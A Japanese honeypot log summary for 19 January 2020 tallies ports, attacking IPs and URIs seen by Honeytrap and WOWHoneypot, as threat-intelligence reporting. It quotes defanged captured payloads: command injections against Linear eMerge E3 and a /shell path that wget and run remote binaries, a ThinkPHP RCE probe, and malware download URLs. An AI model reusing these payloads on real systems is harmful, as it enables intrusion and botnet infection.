Honeypot簡易分析(2020/1/19)となります。
Linear eMerge E3 シリーズの脆弱性を狙った攻撃を検知していました。
/card_scan_decoder[.]php?No=30&door=wgethxxp://malwareurl

<Honeytrap>
Local Port Top 10
LocalPort Count
1433 426909 件
445 1200 件
3389 926 件
139 559 件
3391 172 件
81 55 件
52869 50 件
27017 43 件

Remote IP Top 10
RemoteIP Count
153[.]150[.]56[.]210 29911 件
125[.]160[.]67[.]61 29906 件
36[.]79[.]250[.]161 29899 件
113[.]161[.]25[.]41 29890 件
113[.]161[.]192[.]227 29859 件
39[.]52[.]109[.]19 29094 件
86[.]98[.]212[.]179 26546 件
188[.]129[.]220[.]93 26341 件

Malware
Malware Count
No Malware 433579 件
hxxp://51[.]77[.]213[.]109/mips 9 件
hxxp://91[.]92[.]66[.]124/ 2 件
hxxp://188[.]209[.]49[.]244/aa/arm7 1 件
hxxp://89[.]35[.]39[.]74/jaws[.]sh 1 件
hxxp://51[.]81[.]117[.]21/kttp[.]mips 1 件
hxxp://167[.]172[.]155[.]138/EkSgsEdbins[.]sh 1 件

<wowhoneypot>
URI Path
URI PATH Count
/ Target:- 34 件
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/TP/public/index[.]php Target:ThinkPHP 3 件
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
/robots[.]txt Target:text 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
/shell Target:wegshell 1 件
/card_scan_decoder[.]php Target:new path 1 件

Remote IP Top 10RemoteIP Count
77[.]247[.]108[.]77 16 件
77[.]247[.]108[.]119 7 件
120[.]41[.]139[.]213 4 件
189[.]0[.]43[.]191 2 件
45[.]248[.]43[.]73 1 件
159[.]65[.]188[.]111 1 件
51[.]15[.]191[.]81 1 件
88[.]249[.]115[.]87 1 件

All URI
URI Count
/ Target:- 34 件
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
/robots[.]txt Target:text 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE Target:wegshell 1 件
/TP/public/index[.]php Target:ThinkPHP 1 件
/TP/public/index[.]php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 Target:ThinkPHP 1 件
/TP/public/index[.]php?s=captcha Target:ThinkPHP 1 件
/card_scan_decoder[.]php?No=30&door=wgethxxp://switchnets[.]net/hoho[.]arm7;chmod777hoho[.]arm7;[.]/hoho[.]arm7linear Target:new path 1 件

<wowhoneypotssl>
URI Path
URI PATH Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/favicon[.]ico Target:new path 8 件
/vpns/cfg/smb[.]conf Target:new path 7 件
/ Target:- 5 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件

Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 16 件
164[.]70[.]224[.]8 16 件
77[.]247[.]108[.]119 7 件
196[.]52[.]43[.]59 1 件
74[.]82[.]47[.]5 1 件
213[.]32[.]122[.]82 1 件
193[.]57[.]40[.]46 1 件
128[.]14[.]133[.]58 1 件

All URI
URI Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/favicon[.]ico Target:new path 8 件
/vpns/cfg/smb[.]conf Target:new path 7 件
/ Target:- 5 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件